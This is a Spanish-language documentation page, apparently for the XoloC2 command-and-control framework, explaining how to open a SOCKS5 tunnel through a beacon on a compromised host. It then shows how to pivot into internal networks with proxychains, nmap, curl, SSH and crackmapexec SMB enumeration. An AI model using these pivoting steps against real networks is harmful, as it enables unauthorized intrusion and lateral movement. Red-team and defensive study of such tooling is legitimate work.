Túnel SOCKS5
Túnel SOCKS5
Sección titulada «Túnel SOCKS5»Los beacons de XoloC2 incluyen un proxy SOCKS5 integrado. El tráfico se multiplexa sobre el canal de polling HTTPS existente — no se necesitan binarios adicionales en el objetivo.
Paso 1 — Iniciar el túnel
Sección titulada «Paso 1 — Iniciar el túnel»En el panel de sesión, haz clic en Túnel SOCKS5, establece un puerto local (por defecto 1080) y haz clic en Iniciar.
O envía directamente en la terminal:
__tunnel__ 1080Esto abre un listener SOCKS5 en el puerto 1080 de tu servidor XoloC2.
Paso 2 — Configurar proxychains
Sección titulada «Paso 2 — Configurar proxychains»Edita /etc/proxychains4.conf:
[ProxyList]socks5 127.0.0.1 1080Paso 3 — Enrutar tus herramientas a través del túnel
Sección titulada «Paso 3 — Enrutar tus herramientas a través del túnel»# Escaneo de redproxychains4 nmap -sT -Pn 192.168.1.0/24
# Petición HTTP a host internoproxychains4 curl http://192.168.1.10/
# SSH a host internoproxychains4 ssh usuario@192.168.1.10
# Enumeración SMBproxychains4 crackmapexec smb 192.168.1.0/24Paso 4 — Detener el túnel
Sección titulada «Paso 4 — Detener el túnel»__tunnel__ stopO haz clic en Detener en el panel de sesión.
Múltiples túneles
Sección titulada «Múltiples túneles»Ejecuta túneles simultáneos en diferentes puertos desde diferentes sesiones:
# Sesión A — primer pivot__tunnel__ 1080
# Sesión B — pivot más profundo__tunnel__ 1081- UDP no está soportado
- Todos los protocolos TCP funcionan: HTTP, SSH, SMB, RDP, etc.
- El túnel sobrevive los ciclos de sleep del beacon — el tráfico se encola y se reanuda en el próximo poll